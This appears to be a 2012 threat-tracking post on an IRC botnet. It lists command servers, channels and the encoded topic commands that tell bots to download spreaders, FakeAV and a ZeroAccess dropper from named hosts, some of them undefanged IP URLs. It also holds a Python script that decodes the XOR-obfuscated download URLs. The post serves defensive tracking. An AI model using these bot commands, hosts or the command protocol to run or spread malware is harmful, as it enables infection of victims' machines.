Resolved srv5050.asia to 62.255.175.157
Resolved srv5050.pro to 62.255.175.157
This is snk’s new set of domains for his bot.
Server: srv5050.asia (backup domains are srv5050.pro and srv5050.in)
Port: 5050
Channel: #new
* Topic for #new is: .j #gt .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/127/101/100/57/107/112/38/96/93/121/
* Topic for #new set by x at Sun Dec 23 16:33:45 2012
Channel: #gt
* Topic for #gt is: .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/127/101/100/57/107/107/38/96/93/121/
* Topic for #gt set by x at Sun Dec 23 07:38:44 2012
Bots joining #new download hxxp://ccibltd.net/go.exe, which is snk’s spreading program.
Bots joining #gt download hxxp://ccibltd.net/gt.exe, which looks up the victim's country via api.wipmania.com (an IP geolocation service) before downloading a copy of the ZeroAccess rootkit from hxxp://ccibltd.net/st.exe.
Hosting info: http://whois.domaintools.com/62.255.175.157
Update:
snk has noticed the attention and is moving to new channels and download hosts.
* Topic for #new is: .d /100/97/111/124/49/59/47/109/126/122/123/83/114/126/110/100/96/105/110/112/100/102/127/127/112/122/43/70/115/34/111/123/12/106/41/115/100/127/
* Topic for #new set by x at Mon Dec 24 06:07:24 2012
Downloads hxxp://europeantripadvisor.co.uk/b.exe, which connects to the same server on channel #go
* Topic for #go is: .d /100/97/111/124/49/59/47/127/124/127/58/87/101/122/101/118/123/120/48/100/107/62/117/99/114/39/98/74/50/105/98/117/
* Topic for #go set by x at Mon Dec 24 12:35:05 2012
Bots joining #go download hxxp://www.treefix.uk.com/go.exe, which is snk's spreading program.
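The topic strings above are the bot's command channel: ".j #chan" tells bots to join a channel and ".d /NNN/NNN/.../" carries a download URL, one decimal byte per field. The decoder below is an added example written for this post, not snk's code and not code from the original page. It assumes the obfuscation is a byte-wise XOR with a key that depends only on the byte position, never on the URL, and it tests that assumption the way a tracker would: recover the key stream from one topic whose URL is already known (the Dec 24 #new topic and europeantripadvisor.co.uk/b.exe, a known-plaintext pair), then reuse it on the other topics quoted on this page and check that real URLs come out. The other topics and URLs are copied from this page; the check on the decoded text is the only safeguard against feeding a blob longer than the recovered key or a topic that uses a different key. One caveat worth noticing: the #new topic decodes to a host with a "www." prefix, which the hxxp listing above omits.

```python
import re

# Known-plaintext pair from the post: the #new topic set on Mon Dec 24 06:07
# and the URL the bots fetched after reading it (http:// here so that the byte
# count matches the 38 fields; the post de-fangs it as hxxp://).
KNOWN_BLOB = ("/100/97/111/124/49/59/47/109/126/122/123/83/114/126/110/100/96/105/110/"
              "112/100/102/127/127/112/122/43/70/115/34/111/123/12/106/41/115/100/127/")
KNOWN_URL = "http://europeantripadvisor.co.uk/b.exe"

# Topic commands observed on the page: ".j #chan" (join) and ".d /bytes/" (download).
CMD_RE = re.compile(r"\.([jd])\s+(\S+)")


def unpack(blob: str) -> bytes:
    """'/100/97/111/' -> b'dao': one decimal value per slash-separated field."""
    return bytes(int(v) for v in blob.strip("/").split("/"))


def recover_keystream(blob: str, url: str) -> bytes:
    """Known-plaintext recovery of a positional XOR key: key[i] = enc[i] ^ plain[i]."""
    enc = unpack(blob)
    if len(enc) != len(url):
        raise ValueError(f"blob has {len(enc)} bytes, plaintext has {len(url)}")
    return bytes(e ^ ord(p) for e, p in zip(enc, url))


KEY = recover_keystream(KNOWN_BLOB, KNOWN_URL)  # 38 key bytes, enough for every topic on the page


def decode_blob(blob: str, key: bytes = KEY) -> str:
    """XOR the packed bytes against the recovered key stream and sanity-check the result."""
    enc = unpack(blob)
    if len(enc) > len(key):
        raise ValueError(f"blob needs {len(enc)} key bytes, only {len(key)} recovered")
    out = bytes(e ^ k for e, k in zip(enc, key))
    # Non-printable output means the position-only key assumption failed for this topic.
    if not all(0x20 <= b < 0x7F for b in out):
        raise ValueError("decoded bytes are not printable ASCII; key stream mismatch")
    return out.decode("ascii")


def decode_topic(topic: str, key: bytes = KEY) -> dict:
    """Turn one raw topic string into the channels to join and the URLs to fetch."""
    joins, urls = [], []
    for cmd, arg in CMD_RE.findall(topic):
        if cmd == "j":
            joins.append(arg)
        else:
            urls.append(decode_blob(arg, key))
    return {"join": joins, "download": urls}


# Constructed from the topics quoted in this post: (channel, topic text).
PAGE_TOPICS = [
    ("#new", ".j #gt .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/"
             "127/101/100/57/107/112/38/96/93/121/"),
    ("#go", ".d /100/97/111/124/49/59/47/127/124/127/58/87/101/122/101/118/123/120/48/100/107/"
            "62/117/99/114/39/98/74/50/105/98/117/"),
    ("#gea", ".d /100/97/111/124/49/59/47/124/121/109/113/69/126/103/46/101/121/46/125/126/109/"
             "63/113/105/126/38/96/93/121/"),
    ("#x", ".j #ss .d /100/97/111/124/49/59/47/106/110/124/96/90/100/115/105/99/102/46/125/126/"
           "109/63/101/96/49/109/125/64/"),
]


if __name__ == "__main__":
    for chan, topic in PAGE_TOPICS:
        print(chan, decode_topic(topic))
```

Running it prints the join targets and plain URLs for each topic; every one of them matches a host the post already lists, which is the evidence that the key is fixed per position rather than per URL, so a tracker only needs one confirmed download to read every later topic on the server without a sandbox run.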
Keep moving snk
* Topic for #go is: .j #gea
* Topic for #go set by x at Mon Dec 24 17:48:31 2012
* Topic for #gea is: .d /100/97/111/124/49/59/47/124/121/109/113/69/126/103/46/101/121/46/125/126/109/63/113/105/126/38/96/93/121/
* Topic for #gea set by x at Mon Dec 24 16:39:08 2012
Bots joining #gea download hxxp://treefix.uk.com/gea.exe, which checks api.wipmania.com before downloading ZeroAccess from hxxp://www.treefix.uk.com/st.exe.
Once again,
* Topic for #go is: .d /100/97/111/124/49/59/47/122/98/107/124/79/99/123/46/115/125/46/107/122/47/101/102/101/49/109/125/64/
* Topic for #go set by x at Tue Dec 25 04:18:32 2012
Downloads hxxp://richltd.co.uk/upi.exe, which connects to #o
* Topic for #o is: .j #gea .d /100/97/111/124/49/59/47/127/124/127/58/87/127/122/102/127/125/100/100/126/110/117/56/111/112/38/112/78/51/127/52/117/91/109/
* Topic for #o set by x at Tue Dec 25 15:21:38 2012
Downloads hxxp://www.thefoodzone.co.uk/s.exe, which is snk’s spreading program
* Topic for #gea is: .d /100/97/111/124/49/59/47/124/99/109/114/76/120/123/122/127/124/101/48/114/111/62/99/103/48/120/98/11/121/116/127/
* Topic for #gea set by x at Tue Dec 25 09:29:43 2012
Downloads hxxp://www.thefoodzone.co.uk/pg.exe, which checks with api.wipmania.com before downloading hxxp://www.thefoodzone.co.uk/ppi.exe
Keep running snk
* Topic for #go is: .d /100/97/111/124/49/59/47/127/124/127/58/66/101/112/109/113/126/101/119/98/117/98/115/34/124/103/43/80/119/35/120/62/70/112/98/
* Topic for #go set by x at Wed Dec 26 11:39:55 2012
Downloads hxxp://aromaleisure.co.uk/b.exe, which connects to #o
* Topic for #o is: .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/105/56/105/103/109/
* Topic for #o set by x at Thu Dec 27 14:01:13 2012
Downloads hxxp://pp-tech.co.uk/y.exe, which connects to #y
* Topic for #y is: .j #gea .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/114/100/109/49/109/125/64/
* Topic for #y set by x at Thu Dec 27 14:05:57 2012
Downloads hxxp://pp-tech.co.uk/bra.exe, which is snk’s spreading program
* Topic for #gea is: .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/119/98/120/49/109/125/64/
* Topic for #gea set by x at Thu Dec 27 14:06:05 2012
Downloads hxxp://pp-tech.co.uk/gtt.exe, which checks api.wipmania.com before downloading hxxp://aromaleisure.co.uk/stt.exe, which is ZeroAccess.
snk u are a noob dont forget
Downloads: hxxp://bettyslist.com/b.exe
hxxp://deltatecc.net/putty.exe snk told me this is FakeAV lol
hxxp://74.208.223.26/sl.exe (bettyslist.com)
hxxp://87.106.60.248/gh.exe (deltatecc.net)
srv5050.asia TCP port 5050
Server: 213.165.85.114:5050
Server Password:
Username: x
Nickname: n[DEU|XP]rjiipla
Channel: #x (Password: (null))
Channeltopic: :.j #ss .d /100/97/111/124/49/59/47/106/110/124/96/90/100/115/105/99/102/46/125/126/109/63/101/96/49/109/125/64/
SMTP: 213.165.67.97:25 used to spread via email